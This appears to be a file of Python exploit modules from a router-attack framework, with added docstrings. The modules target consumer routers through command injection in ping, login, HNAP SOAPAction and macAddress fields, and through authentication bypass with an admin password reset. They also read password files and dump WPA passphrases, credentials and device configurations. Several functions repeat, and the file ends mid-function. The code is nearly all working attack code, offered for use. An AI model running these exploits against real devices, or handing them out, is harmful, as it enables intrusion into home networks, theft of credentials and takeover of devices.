def do_run(self, e):
    """Send one POST to /diagnostic.php with ``self.command`` placed in the ping target.

    The form carries ``act=ping`` and a ``dst`` value of the form ``& <command>&``.
    No command output is returned; only the ``<report>OK</report>`` marker in the
    reply is checked.

    Defensive reading: the request is recognisable by the ``&`` characters wrapped
    around ``dst`` and by the ``Accept-Language`` value, which repeats the header
    name inside the value.

    Args:
        e: Unused by this method.
    """
    endpoint = "http://%s:%s/diagnostic.php" % (self.host, self.port)
    form_fields = {'act': 'ping', 'dst': '& %s&' % self.command}
    request_headers = {
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        # The value repeats the header name; kept byte-for-byte.
        'Accept-Language': 'Accept-Language: en-us,en;q=0.5',
        'Accept-Encoding': 'gzip, deflate',
        'Content-Type': 'application/x-www-form-urlencoded;charset=utf-8',
    }
    try:
        print_yellow("Sending exploit")
        reply = requests.post(endpoint, headers=request_headers,
                              data=form_fields, timeout=60)
        if "<report>OK</report>" not in reply.text:
            print_error("could not find marker in response, exploit failed")
        else:
            print_success("output not available this is blind injection")
    # Handler order matters: a connect timeout derives from both exception types.
    except requests.Timeout:
        print_error("timeout")
    except requests.ConnectionError:
        print_error("exploit failed")
def query_yes_no(question, default="yes"):
    """Prompt with a yes/no question on the console and return the answer as a bool.

    Args:
        question: Text shown to the user; the ``[y/n]`` hint is appended to it.
        default: Answer assumed when the user just presses Enter. Must be
            ``"yes"``, ``"no"`` or ``None`` (``None`` means an explicit answer
            is required).

    Returns:
        ``True`` for a "yes" answer, ``False`` for a "no" answer.

    Raises:
        ValueError: If *default* is not one of the accepted values.
    """
    answers = {"yes": True, "y": True, "ye": True, "no": False, "n": False}

    # The capital letter in the hint marks which answer Enter selects.
    if default is None:
        hint = " [y/n] "
    elif default == "yes":
        hint = " [Y/n] "
    elif default == "no":
        hint = " [y/N] "
    else:
        raise ValueError("invalid default answer: '%s'" % default)

    while True:
        print_yellow(question + hint)
        reply = input().lower()
        if reply == '' and default is not None:
            return answers[default]
        if reply in answers:
            return answers[reply]
        print_red("Please respond with 'yes' or 'no' "
                  "(or 'y' or 'n').\n")
def do_run(self, e):
    """Probe /login_handler.php with an echo marker, then send ``self.command``.

    The first POST appends ``echo "741852`` to the ``reqMethod`` field; if the
    digits come back in the reply, a second POST carries ``self.command`` in the
    same position and its reply is printed. A reply containing ``failure`` is
    reported as a probably patched target. Any other reply produces no output.

    Defensive reading: both requests carry ``"`` and ``;`` inside ``reqMethod``.

    Args:
        e: Unused by this method.
    """
    endpoint = "http://%s:%s/login_handler.php" % (self.host, self.port)
    request_headers = {
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        # The value repeats the header name; kept byte-for-byte.
        'Accept-Language': 'Accept-Language: en-us,en;q=0.5',
        'Content-Type': 'application/x-www-form-urlencoded;charset=utf-8',
    }
    # Both request bodies share this prefix; only the trailing text differs.
    body_template = 'reqMethod=json_cli_reqMethod" "json_cli_jsonData"; %s'
    try:
        probe = requests.post(url=endpoint, headers=request_headers,
                              data=body_template % 'echo "741852', timeout=60)
        if "741852" in probe.text:
            print_success("target is vulnerable")
            # The original author was unsure how commands with arguments are quoted.
            outcome = requests.post(url=endpoint, headers=request_headers,
                                    data=body_template % self.command, timeout=60)
            print_green(outcome.text)
        elif "failure" in probe.text:
            print_error("Exploit failed, target is probably patched")
            print_yellow(probe.text)
    except requests.Timeout:
        print_error("exploit failed")
    except requests.ConnectionError:
        print_error("exploit failed")
def do_run(self, e):
    """POST ``self.command`` to /command.php in the ``cmd`` field and print the reply.

    The request is prepared by hand so that the body can be replaced with a
    version quoted by ``urllib.parse.quote(..., safe='/=')`` instead of the form
    encoding that ``requests`` applies on its own.

    NOTE: success is decided by the bare substring ``end`` in the reply (the
    original comment mentions a tag ``end8758``, which the code does not use),
    so any page containing those three letters is reported as success.

    Args:
        e: Unused by this method.
    """
    endpoint = "http://%s:%s/command.php" % (self.host, self.port)
    form_fields = {'cmd': '%s; echo end' % self.command}
    request_headers = {
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        # The value repeats the header name; kept byte-for-byte.
        'Accept-Language': 'Accept-Language: en-us,en;q=0.5',
        'Accept-Encoding': 'gzip, deflate',
        'Content-Type': 'application/x-www-form-urlencoded;charset=utf-8',
    }
    try:
        print_yellow("Sending exploit")
        prepared = requests.Request('POST', endpoint, headers=request_headers,
                                    data=form_fields).prepare()
        # Swap in the hand-quoted body and keep Content-Length in step with it.
        prepared.body = urllib.parse.quote('cmd=%s; echo end' % self.command, safe='/=')
        prepared.headers['Content-Length'] = len(prepared.body)
        session = requests.Session()
        reply = session.send(prepared, timeout=15)
        session.close()
        if "end" not in reply.text:
            print_error("could not find marker in response, exploit failed")
        else:
            print_success("output of %s:" % self.command)
            print_green(reply.text)
    # Handler order matters: a connect timeout derives from both exception types.
    except requests.Timeout:
        print_error("timeout")
    except requests.ConnectionError:
        print_error("exploit failed or you killed httpd")
def do_run(self, e):
    """POST to /HNAP1 with ``self.command`` in backticks inside the SOAPAction header.

    A dropped connection is reported as "exploit sent."; the operator is then
    asked whether to open a Telnet session to ``self.host`` on ``self.port``,
    dump the configuration with ``xmldbc`` and write it to ``config.xml``.

    Defensive reading: the request is recognisable by backticks in the
    ``SOAPAction`` value; the resulting ``config.xml`` holds device settings in
    clear text and should be handled accordingly.

    NOTE(review): block nesting was reconstructed from a listing without
    indentation; the final reminder is assumed to belong to the Telnet branch.

    Args:
        e: Unused by this method.
    """
    endpoint = "http://%s:%s/HNAP1" % (self.host, self.port)
    soap_headers = {
        "SOAPAction": '"http://purenetworks.com/HNAP1/GetDeviceSettings/`%s`"' % self.command
    }
    try:
        print_yellow("Sending exploit")
        requests.post(endpoint, headers=soap_headers, timeout=60)
        print_yellow("HTTPd is still responding this is OK if you changed the payload")
    # Handler order matters: a connect timeout derives from both exception types
    # and must land in this first handler, as in the original.
    except requests.ConnectionError:
        print_success("exploit sent.")
        answer = query_yes_no("Do you wish to dump all system settings? (if telned was started)")
        if answer is not True:
            return
        session = telnetlib.Telnet(self.host, self.port)
        print_yellow("Sending command through telnet")
        session.read_until(b'#', timeout=15)  # wait for the first shell prompt
        session.write(b"xmldbc -d /var/config.xml; cat /var/config.xml\n")
        dump = session.read_until(b'#', timeout=15)
        session.close()
        print_yellow("Writing response to config.xml")
        writetextfile(dump.decode('ascii'), "config.xml")
        print_yellow("Don't forget to restart httpd or reboot the device")
    except requests.Timeout:
        print_error("timeout")
def do_run(self, e):
    """Request /tools_admin.php with auth-override parameters, then set the admin password.

    The GET adds ``NO_NEED_AUTH=1&AUTH_GROUP=0`` to the query string; a 200 reply
    containing the ``admin_password1`` form field is taken as confirmation. The
    follow-up POST submits the admin form with ``self.password`` in both password
    fields and the same two override parameters.

    Defensive reading: any request carrying ``NO_NEED_AUTH`` / ``AUTH_GROUP`` as
    client-supplied parameters is worth alerting on, and a successful run
    changes the device's admin credential.

    Args:
        e: Unused by this method.
    """
    admin_page = "http://%s:%s/tools_admin.php" % (self.host, self.port)
    try:
        print_yellow("Sending exploit")
        probe = requests.get(admin_page + "?NO_NEED_AUTH=1&AUTH_GROUP=0", timeout=60)
        form_visible = probe.status_code == 200 and 'name="admin_password1"' in probe.text
        if not form_visible:
            print_error("exploit failed")
            return
        print_success("target seems vulnerable")
        print_green("You can visit any page by adding ?NO_NEED_AUTH=1&AUTH_GROUP=0 to URL")
        print_yellow("Changing admin password")
        request_headers = {
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            # The value repeats the header name; kept byte-for-byte.
            'Accept-Language': 'Accept-Language: en-us,en;q=0.5',
            'Accept-Encoding': 'gzip, deflate',
            'Content-Type': 'application/x-www-form-urlencoded;charset=utf-8',
        }
        form_fields = {
            'NO_NEED_AUTH': 1,
            'AUTH_GROUP': 0,
            'ACTION_POST': 1,
            'apply': 'Save+Settings',
            'admin_name': 'admin',
            'admin_password1': '%s' % self.password,
            'admin_password2': '%s' % self.password,
            'grap_auth_enable_h': 0,
            'rt_ipaddr': '0.0.0.0',
        }
        change = requests.post(url=admin_page, headers=request_headers,
                               data=form_fields, timeout=60)
        # Only the status code is checked; the reply body is not inspected.
        if change.status_code != 200:
            print_error("password change failed")
        else:
            print_success("password seems to be changed try to login with: %s" % self.password)
    except requests.Timeout:
        print_error("timeout")
    except requests.ConnectionError:
        print_error("exploit failed")
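def do_run(self, e):
    """Request __show_info.php with REQUIRE_FILE=/var/etc/httpasswd and print the first match.

    A 200 reply containing ``<center>`` is parsed with a regex that expects the
    credential line on the line after the tag, indented by three tabs.

    Fix over the original: when the tag is present but the regex finds nothing,
    ``credentials[0]`` raised an uncaught ``IndexError``; that case is now
    reported, and success is announced only once a value was extracted.

    Handling note: the value is written to stdout in clear text, so it ends up
    in terminal scrollback and any session log.

    Args:
        e: Unused by this method.
    """
    url = "http://%s:%s/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd" % (self.host, self.port)
    try:
        print_yellow("Sending exploit")
        response = requests.get(url, timeout=60)
        if response.status_code == 200 and "<center>" in response.text:
            credentials = re.findall("<center>\n\t\t\t(.*)", response.text)
            if credentials:
                print_success("credentials fetched")
                print(credentials[0])
            else:
                print_error("response contained <center> but no credential line could be parsed")
    except requests.Timeout:
        print_error("timeout")
    except requests.ConnectionError:
        print_error("exploit failed")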
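def do_run(self, e):
    """Request __show_info.php with REQUIRE_FILE=/var/etc/httpasswd and print the first match.

    A 200 reply containing ``<center>`` is parsed with a regex that expects the
    credential line on the line after the tag, indented by three tabs.

    Fix over the original: when the tag is present but the regex finds nothing,
    ``credentials[0]`` raised an uncaught ``IndexError``; that case is now
    reported, and success is announced only once a value was extracted.

    Handling note: the value is printed in clear text, so it ends up in terminal
    scrollback and any session log.

    Args:
        e: Unused by this method.
    """
    url = "http://%s:%s/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd" % (self.host, self.port)
    try:
        print_yellow("Sending exploit")
        response = requests.get(url, timeout=60)
        if response.status_code == 200 and "<center>" in response.text:
            credentials = re.findall("<center>\n\t\t\t(.*)", response.text)
            if credentials:
                print_success("credentials fetched")
                print_green(credentials[0])
            else:
                print_error("response contained <center> but no credential line could be parsed")
    except requests.Timeout:
        print_error("timeout")
    except requests.ConnectionError:
        print_error("exploit failed")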
def do_run(self, e):
    """Check whether requesting BRS_netgear_success.html removes the password prompt.

    If the root URL answers 401, the page ``/BRS_netgear_success.html`` is
    requested three times one second apart and the root URL is fetched again; a
    200 on that second fetch is reported as a bypass. Nothing is printed when
    the first reply is not 401 or the second is not 200.

    NOTE: every ``requests`` failure, not only a timeout, is reported with the
    message "timeout!". ``self.port`` must be a string, since the URL is built
    by concatenation.

    NOTE(review): block nesting was reconstructed from a listing without
    indentation; the re-check is assumed to run only after a 401.

    Args:
        e: Unused by this method.
    """
    base_url = "http://" + self.host + ":" + self.port
    try:
        first = requests.get(base_url, timeout=60)
        if first.status_code != requests.codes.unauthorized:
            return
        print_yellow("Password protection detected")
        for _ in range(3):
            time.sleep(1)
            requests.get(base_url + "/BRS_netgear_success.html", timeout=60)
        second = requests.get(base_url, timeout=60)
        if second.status_code == requests.codes.ok:
            print_success("bypass successful. Now use your browser to have at look at the admin interface.")
    except requests.RequestException:
        print_error("timeout!")
def do_run(self, e):
    """Fetch the root URL of the target and print status line, headers and optionally the body.

    The scheme is ``http`` only when ``self.ssl`` is exactly ``False``; any other
    value selects ``https``. The body is printed only when ``self.body`` is
    exactly ``True``.

    Security note: the request is made with ``verify=False``, so the server
    certificate is not validated and the printed response cannot be tied to an
    authenticated peer.

    NOTE(review): block nesting was reconstructed from a listing without
    indentation; the body is assumed to be printed once, after the header loop.

    Args:
        e: Unused by this method.
    """
    scheme = "http" if self.ssl is False else "https"
    url = "%s://%s:%s" % (scheme, self.host, self.port)
    try:
        print_yellow("Sending GET request")
        response = requests.get(url, timeout=60, verify=False)
        print_green("[%s %s] %s" % (response.status_code, response.reason, response.url))
        for name, value in response.headers.items():
            print_green("%s: %s" % (name, value))
        if self.body is True:
            print("\n")
            print_green(response.text)
    # Handler order matters: a connect timeout derives from both exception types.
    except requests.ConnectionError as err:
        print_error("connection error %s" % err)
    except requests.Timeout:
        print_error("timeout")
def do_run(self, e):
    """Check whether requesting BRS_netgear_success.html removes the password prompt.

    If the root URL answers 401, the page ``/BRS_netgear_success.html`` is
    requested three times one second apart and the root URL is fetched again; a
    200 on that second fetch is reported as a bypass. Nothing is printed when
    the first reply is not 401 or the second is not 200.

    NOTE: every ``requests`` failure, not only a timeout, is reported with the
    message "timeout!". ``self.port`` must be a string, since the URL is built
    by concatenation.

    NOTE(review): block nesting was reconstructed from a listing without
    indentation; the re-check is assumed to run only after a 401.

    Args:
        e: Unused by this method.
    """
    base_url = "http://" + self.host + ":" + self.port
    try:
        first = requests.get(base_url, timeout=60)
        if first.status_code != requests.codes.unauthorized:
            return
        print_yellow("Password protection detected")
        for _ in range(3):
            time.sleep(1)
            requests.get(base_url + "/BRS_netgear_success.html", timeout=60)
        second = requests.get(base_url, timeout=60)
        if second.status_code == requests.codes.ok:
            print_success(
                "bypass successful. Now use your browser to have at look at the admin interface."
            )
    except requests.RequestException:
        print_error("timeout!")
def do_run(self, e):
    """POST to the device-config page and save a returned attachment as config.bin.

    The request uploads an empty ``config`` file field to
    ``getpage.gch?pid=101&nextpage=manager_dev_config_t.gch``. A 200 reply that
    carries a ``Content-Disposition`` header is treated as the configuration
    file and written to ``config.bin`` in the working directory.

    Handling note: the saved file is a device configuration backup and should be
    stored and disposed of like any other file holding credentials.

    Args:
        e: Unused by this method.
    """
    endpoint = "http://%s:%s/getpage.gch?pid=101&nextpage=manager_dev_config_t.gch" % (self.host, self.port)
    try:
        print_yellow("Sending exploit")
        # stream=True is kept from the original, whose author found the file
        # could otherwise arrive incomplete.
        reply = requests.post(endpoint, files={'config': ''}, timeout=60, stream=True)
        is_download = reply.status_code == 200 and reply.headers.get('Content-Disposition')
        if is_download:
            print_success("got file in response")
            print_yellow("Writing file to config.bin")
            core.io.writefile(reply.content, "config.bin")
            print_success("you can now use decryptors/zte/config_zlib_decompress to extract XML")
    # Handler order matters: a connect timeout derives from both exception types.
    except requests.ConnectionError as err:
        print_error("connection error %s" % err)
    except requests.Timeout:
        print_error("timeout")
def do_run(self, e):
    """POST ``self.command`` to /command.php in the ``cmd`` field and print the reply.

    The request is prepared by hand so that the body can be replaced with a
    version quoted by ``urllib.parse.quote(..., safe='/=')`` instead of the form
    encoding that ``requests`` applies on its own.

    NOTE: success is decided by the bare substring ``end`` in the reply (the
    original comment mentions a tag ``end8758``, which the code does not use),
    so any page containing those three letters is reported as success.

    Args:
        e: Unused by this method.
    """
    endpoint = "http://%s:%s/command.php" % (self.host, self.port)
    form_fields = {'cmd': '%s; echo end' % self.command}
    request_headers = {
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        # The value repeats the header name; kept byte-for-byte.
        'Accept-Language': 'Accept-Language: en-us,en;q=0.5',
        'Accept-Encoding': 'gzip, deflate',
        'Content-Type': 'application/x-www-form-urlencoded;charset=utf-8',
    }
    try:
        print_yellow("Sending exploit")
        prepared = requests.Request('POST', endpoint, headers=request_headers,
                                    data=form_fields).prepare()
        # Swap in the hand-quoted body and keep Content-Length in step with it.
        prepared.body = urllib.parse.quote('cmd=%s; echo end' % self.command, safe='/=')
        prepared.headers['Content-Length'] = len(prepared.body)
        session = requests.Session()
        reply = session.send(prepared, timeout=15)
        session.close()
        if "end" not in reply.text:
            print_error(
                "could not find marker in response, exploit failed")
        else:
            print_success("output of %s:" % self.command)
            print_green(reply.text)
    # Handler order matters: a connect timeout derives from both exception types.
    except requests.Timeout:
        print_error("timeout")
    except requests.ConnectionError:
        print_error("exploit failed or you killed httpd")
def do_run(self, e):
    """POST to /HNAP1 with ``self.command`` in backticks inside the SOAPAction header.

    A dropped connection is reported as "exploit sent."; the operator is then
    asked whether to open a Telnet session to ``self.host`` on ``self.port``,
    dump the configuration with ``xmldbc`` and write it to ``config.xml``.

    Defensive reading: the request is recognisable by backticks in the
    ``SOAPAction`` value; the resulting ``config.xml`` holds device settings in
    clear text and should be handled accordingly.

    NOTE(review): block nesting was reconstructed from a listing without
    indentation; the final reminder is assumed to belong to the Telnet branch.

    Args:
        e: Unused by this method.
    """
    endpoint = "http://%s:%s/HNAP1" % (self.host, self.port)
    soap_headers = {
        "SOAPAction": '"http://purenetworks.com/HNAP1/GetDeviceSettings/`%s`"' % self.command
    }
    try:
        print_yellow("Sending exploit")
        requests.post(endpoint, headers=soap_headers, timeout=60)
        print_yellow("HTTPd is still responding this is OK if you changed the payload")
    # Handler order matters: a connect timeout derives from both exception types
    # and must land in this first handler, as in the original.
    except requests.ConnectionError:
        print_success("exploit sent.")
        answer = query_yes_no("Do you wish to dump all system settings? (if telned was started)")
        if answer is not True:
            return
        session = telnetlib.Telnet(self.host, self.port)
        print_yellow("Sending command through telnet")
        session.read_until(b'#', timeout=15)  # wait for the first shell prompt
        session.write(b"xmldbc -d /var/config.xml; cat /var/config.xml\n")
        dump = session.read_until(b'#', timeout=15)
        session.close()
        print_yellow("Writing response to config.xml")
        writetextfile(dump.decode('ascii'), "config.xml")
        print_yellow("Don't forget to restart httpd or reboot the device")
    except requests.Timeout:
        print_error("timeout")
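def do_run(self, e):
    """POST ``SERVICES=DEVICE.ACCOUNT`` to /getcfg.php and print the account entries.

    A reply containing ``<service>DEVICE.ACCOUNT</service>`` is parsed for
    ``<name>`` and ``<password>`` elements. If any password equals the
    placeholder ``==OoXxGgYy==`` the run is reported as failed.

    NOTE(review): in the listing the two print statements and the final ``else``
    were masked (shown as ``******``). They are reconstructed here from the
    surrounding loop and message strings; confirm against the upstream file.
    Names and passwords are paired with ``zip`` so that lists of unequal length
    no longer raise ``IndexError``.

    Handling note: credentials are printed in clear text to the terminal.

    Args:
        e: Unused by this method.
    """
    url = "http://%s:%s/getcfg.php" % (self.host, self.port)
    payload = {'SERVICES': 'DEVICE.ACCOUNT'}
    headers = {
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        # The value repeats the header name; kept byte-for-byte.
        'Accept-Language': 'Accept-Language: en-us,en;q=0.5',
        'Accept-Encoding': 'gzip, deflate',
        'Content-Type': 'application/x-www-form-urlencoded;charset=utf-8',
    }
    try:
        print_yellow("Sending exploit")
        response = requests.post(url, headers=headers, data=payload, timeout=60)
        if "<service>DEVICE.ACCOUNT</service>" in response.text:
            usernames = re.findall("<name>(.*)</name>", response.text)
            passwords = re.findall("<password>(.*)</password>", response.text)
            if "==OoXxGgYy==" in passwords:
                print_error("Exploit failed, router responded with default value ==OoXxGgYy==")
            else:
                print_success("")
                for username, password in zip(usernames, passwords):
                    print_green("Username: " + username)
                    print_green("Password: " + password)
        else:
            print_error("Exploit failed")
    except requests.Timeout:
        print_error("timeout")
    except requests.ConnectionError:
        print_error("exploit failed")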
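def do_run(self, e):
    """Fetch /hidden_info.html, save it, and print the comma-separated fields it embeds.

    A reply containing ``Manufacture Information`` is written to
    ``hidden_info.html`` in the working directory; the text between ``str =("[{``
    and the last ``}`` on that line is then split on commas and printed.

    Fixes over the original: the pattern is now a raw string (the non-raw form
    relied on invalid escape sequences such as ``\\(``, which newer Python
    versions warn about), and a reply that lacks the expected ``str =`` line no
    longer raises an uncaught ``IndexError``.

    NOTE(review): block nesting was reconstructed from a listing without
    indentation; the ``else`` is assumed to pair with the marker check.

    Args:
        e: Unused by this method.
    """
    url = "http://%s:%s/hidden_info.html" % (self.host, self.port)
    try:
        print_yellow("Sending exploit")
        response = requests.get(url, timeout=60)
        if "Manufacture Information" in response.text:
            print_success("information obtained, writing response into hidden_info.html")
            core.io.writetextfile(response.text, "hidden_info.html")
            print_green("Please check file, response seems to depend on FW version, parsing may not be accurate")
            matches = re.findall(r'str =\("\[\{(.*)\}', response.text)
            if matches:
                for item in matches[0].split(','):
                    print_green(item)
            else:
                print_error("unable to parse response, check hidden_info.html")
        else:
            print_error("exploit failed")
    except requests.Timeout:
        print_error("timeout")
    except requests.ConnectionError:
        print_error("exploit failed")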
def de_cfg(self, data):
    """Return ``(kind, raw_config)`` for raw, compressed, or encrypted and compressed input.

    ``self.smart_guess(data)`` classifies the input; depending on the result the
    data is returned as is, passed through ``self.decompress_cfg``, or passed
    through ``self.decrypt_cfg`` and then ``self.decompress_cfg``.

    Returns:
        A ``(kind, data)`` tuple, or ``None`` when the guessed kind is none of
        ``CFG_RAW``, ``CFG_LZO`` or ``CFG_ENC`` (callers that unpack the result
        need to allow for that).
    """
    kind = self.smart_guess(data)
    if kind == self.CFG_RAW:
        print_yellow('File is :\tnot compressed, not encrypted')
        return kind, data
    if kind == self.CFG_LZO:
        print_yellow('File is :\tcompressed, not encrypted')
        return kind, self.decompress_cfg(data)
    if kind == self.CFG_ENC:
        print_yellow('File is :\tcompressed, encrypted')
        plain = self.decrypt_cfg(data)
        return kind, self.decompress_cfg(plain)
    return None
def do_run(self, e):
    """Time a ``sleep 10`` request against each path in ``self.files``, then send ``self.command``.

    For every candidate path a GET is sent whose ``macAddress`` parameter ends
    in ``; sleep 10; echo #``. A 200 reply containing ``Update Success!`` stops
    the search; the elapsed time only decides which message is printed. The
    same URL shape is then used once more with ``self.command``.

    Defensive reading: the requests are recognisable by spaces, ``;`` and ``#``
    inside the ``macAddress`` query parameter.

    NOTE(review): this listing lost its indentation. The nesting below is a
    reconstruction; in particular ``break`` is assumed to sit at the level of
    the outer ``if``. Confirm against the upstream file.
    """
    file = ""
    for file in self.files:
        print_yellow("Testing file: " + file)
        # NOTE(review): the non-ASCII character in the query string looks like
        # an encoding artifact of this listing; confirm against upstream.
        url = "http://%s:%s/%s?writeData=true®info=0&macAddress= 001122334455 -c 0 ;" \
              "%s; echo #" % (self.host, self.port, file, "sleep 10")
        try:
            print_yellow("Doing timebased check with sleep 10")
            time_start = datetime.datetime.now()
            response = requests.get(url=url, timeout=60)
            time_end = datetime.datetime.now()
            delta = time_end - time_start
            if response.status_code == 200 and "Update Success!" in response.text:
                # delta.seconds is the whole-second component, so the accepted
                # window is 10 to 12 seconds.
                if 13 > delta.seconds > 9:
                    print_green("Timebased check OK target should be vulnerable")
                else:
                    print_yellow("Timebased check failed, but target still might be vulnerable")
                break
        except requests.Timeout:
            print_error("timeout")
        except requests.ConnectionError:
            print_error("exploit failed")
    # With the nesting assumed above, this point is reached even when no path
    # answered; `file` then holds the last path tried (or "" for an empty list).
    print_green("Vulnerable file:" + file)
    print_yellow("Sending command")
    url = "http://%s:%s/%s?writeData=true®info=0&macAddress= 001122334455 -c 0 ;" \
          "%s; echo #" % (self.host, self.port, file, self.command)
    try:
        response = requests.get(url=url, timeout=60)
        if response.status_code == 200 and "Update Success!" in response.text:
            print_success("command sent")
    except requests.Timeout:
        print_error("timeout")
    except requests.ConnectionError:
        print_error("target stopped responding or you issued reboot or killed lighttpd")
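def do_run(self, e):
    """Query five SOAP actions on the device root URL and print the parsed fields.

    Each request is a POST to ``http://host:port/`` with a ``SOAPAction`` header
    and an empty form field. The raw reply is saved to an XML file in the
    working directory and selected tags are printed: device description, serial
    number, firmware version, web UI password, SSID, encryption mode, WPA
    passphrase and the attached-device list.

    Fixes over the original: a tag missing from a reply made ``re.search``
    return ``None`` and the resulting ``AttributeError`` escaped the
    ``except IndexError`` handlers; the connection-error handler concatenated a
    ``str`` with the exception object and raised ``TypeError``. The five
    repeated request stanzas are folded into two local helpers.

    Handling note: the saved XML files and the terminal output contain
    credentials in clear text.

    Args:
        e: Unused by this method.
    """
    url = "http://%s:%s/" % (self.host, self.port)
    payload = {"": ""}  # Per the original author, the empty form is what skips authentication
    # Tags are stripped with a regex instead of an XML parser (original design
    # choice, made to avoid an extra dependency).
    striptag = re.compile(r"<.*?>")
    parse_errors = (AttributeError, IndexError)

    def fetch(action, filename):
        """POST one SOAPAction, save the reply to *filename*, return its text."""
        response = requests.post(url, headers={"SOAPAction": action}, data=payload, timeout=60)
        if response.status_code != 200:
            raise requests.ConnectionError
        print_yellow("Writing response to %s" % filename)
        core.io.writetextfile(response.text, filename)
        print_yellow("Parsing response")
        return response.text

    def field(tag, text):
        """Return the tag-stripped rest of the line after ``<tag>``; raises if absent."""
        return striptag.sub("", re.search("<%s>(.*)" % tag, text).group(1))

    try:
        print_yellow("Sending exploit")

        # Request DeviceInfo
        text = fetch("urn:NETGEAR-ROUTER:service:DeviceInfo:1#GetInfo", "DeviceInfo.xml")
        try:
            description = field("Description", text)
            serial_number = field("SerialNumber", text)
            firmware = field("Firmwareversion", text)
            print_green("Device: %s" % description)
            print_green("Serial number: %s" % serial_number)
            print_green("FW version: %s" % firmware)
        except parse_errors:
            print_error("opps unable to locate this regular expression")

        # Request web UI password
        text = fetch("urn:NETGEAR-ROUTER:service:LANConfigSecurity:1#GetInfo", "LANConfigSecurity.xml")
        try:
            print_green("Password: %s" % field("NewPassword", text))
        except parse_errors:
            print_error("opps unable to locate this regular expression")

        # Request WLAN info
        text = fetch("urn:NETGEAR-ROUTER:service:WLANConfiguration:1#GetInfo", "WLANConfiguration.xml")
        try:
            ssid = field("NewSSID", text)
            wlan_encryption = field("NewBasicEncryptionModes", text)
            print_green("SSID: " + ssid)
            print_green("Encryption: %s" % wlan_encryption)
        except parse_errors:
            print_error("opps unable to locate this regular expression")

        # Wlan password
        text = fetch("urn:NETGEAR-ROUTER:service:WLANConfiguration:1#GetWPASecurityKeys",
                     "WLANConfigurationGetWPASecurityKeys.xml")
        try:
            print_green("Passphrase: %s" % field("NewWPAPassphrase", text))
        except parse_errors:
            print_error("opps unable to locate this regular expression")

        # Attached devices
        text = fetch("urn:NETGEAR-ROUTER:service:DeviceInfo:1#GetAttachDevice",
                     "DeviceInfoGetAttachDevice.xml")
        try:
            devices = field("NewAttachDevice", text).split("@")[1:]  # First element is number of records
            for device in devices:
                device = device.split(";")
                print_green("ID: %s" % device[0])
                print_green("IP: %s" % device[1])
                print_green("Name: %s" % device[2])
                print_green("MAC: %s" % interface.utils.lookup_mac(device[3]))
                print_green("Connection type: %s" % device[4])
        except parse_errors:
            print_error("opps unable to locate this regular expression")
    # Handler order matters: a connect timeout derives from both exception types.
    except requests.ConnectionError as err:
        print_error("lost connection %s" % err)
    except requests.Timeout:
        print_error("timeout")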
def do_run(self, e):
    """Fetch sysinfo.cgi and getstinfo.cgi via ``self.send_payload`` and print selected fields.

    The sysinfo reply is saved to the file ``sysinfo`` and searched for the
    default passphrase, MAC address, default SSID, WPS PIN and the SSID and
    passphrase of ``wl0`` and ``wl1``. The getstinfo reply is saved to
    ``getstinfo`` and printed whole.

    Handling note: both files and the terminal output contain wireless and
    admin secrets in clear text.

    NOTE(review): block nesting was reconstructed from a listing without
    indentation; the getstinfo stage is assumed to run whether or not the
    sysinfo stage returned data.

    Args:
        e: Unused by this method.
    """
    print_warning("Sending payload sysinfo")
    result = self.send_payload("sysinfo.cgi")
    if result:
        print_success("Got system information, writing to file")
        core.io.writetextfile(result, "sysinfo")
        print_info("Analyzing sysinfo...")
        # (search pattern, output label, message if building the line fails)
        wanted = (
            ("device::default_passphrase=(.*)", "Default admin passphrasse: ", "Unable to locate passphrasse"),
            ("device::mac_addr=(.*)", "MAC: ", "Unable to locate MAC"),
            ("device::default_ssid=(.*)", "Default SSID:: ", "Unable to locate default SSID"),
            ("device::wps_pin=(.*)", "WPS Pin: ", "Unable to locate WPS pin"),
            ("wl0_ssid=(.*)", "SSID: ", "Unable to locate SSID"),
            ("wl0_passphrase=(.*)", "Passphrase: ", "Unable to locate passphrase"),
            ("wl1_ssid=(.*)", "SSID: ", "Unable to locate SSID"),
            ("wl1_passphrase=(.*)", "Passphrase: ", "Unable to locate passphrase"),
        )
        for pattern, label, failure in wanted:
            found = re.search(pattern, result)
            if not found:
                continue
            try:
                line = label + found.group(1)
                if pattern == "device::mac_addr=(.*)":
                    # Only the MAC line gets the lookup_mac() suffix.
                    line = line + lookup_mac(found.group(1))
                print_green(line)
            except IndexError:
                print_error(failure)
    print_yellow("Sending payload getstinfo")
    result = self.send_payload("getstinfo.cgi")
    if result:
        print_success("Got SSID hash and passphrase hash, writing to file")
        core.io.writetextfile(result, "getstinfo")
        print_success(result)
def do_run(self, e):
    """Fetch sysinfo.cgi and getstinfo.cgi via ``self.send_payload`` and print selected fields.

    The sysinfo reply is saved to the file ``sysinfo`` and searched for the
    default passphrase, MAC address, default SSID, WPS PIN and the SSID and
    passphrase of ``wl0`` and ``wl1``. The getstinfo reply is saved to
    ``getstinfo`` and printed whole.

    Handling note: both files and the terminal output contain wireless and
    admin secrets in clear text.

    NOTE(review): block nesting was reconstructed from a listing without
    indentation; the getstinfo stage is assumed to run whether or not the
    sysinfo stage returned data.

    Args:
        e: Unused by this method.
    """
    print_yellow("Sending payload sysinfo")
    result = self.send_payload("sysinfo.cgi")
    if result:
        print_green("Got system information, writing to file")
        core.io.writetextfile(result, "sysinfo")
        print_green("Analyzing sysinfo...")
        # (search pattern, output label, message if building the line fails)
        wanted = (
            ("device::default_passphrase=(.*)", "Default admin passphrasse: ", "Unable to locate passphrasse"),
            ("device::mac_addr=(.*)", "MAC: ", "Unable to locate MAC"),
            ("device::default_ssid=(.*)", "Default SSID:: ", "Unable to locate default SSID"),
            ("device::wps_pin=(.*)", "WPS Pin: ", "Unable to locate WPS pin"),
            ("wl0_ssid=(.*)", "SSID: ", "Unable to locate SSID"),
            ("wl0_passphrase=(.*)", "Passphrase: ", "Unable to locate passphrase"),
            ("wl1_ssid=(.*)", "SSID: ", "Unable to locate SSID"),
            ("wl1_passphrase=(.*)", "Passphrase: ", "Unable to locate passphrase"),
        )
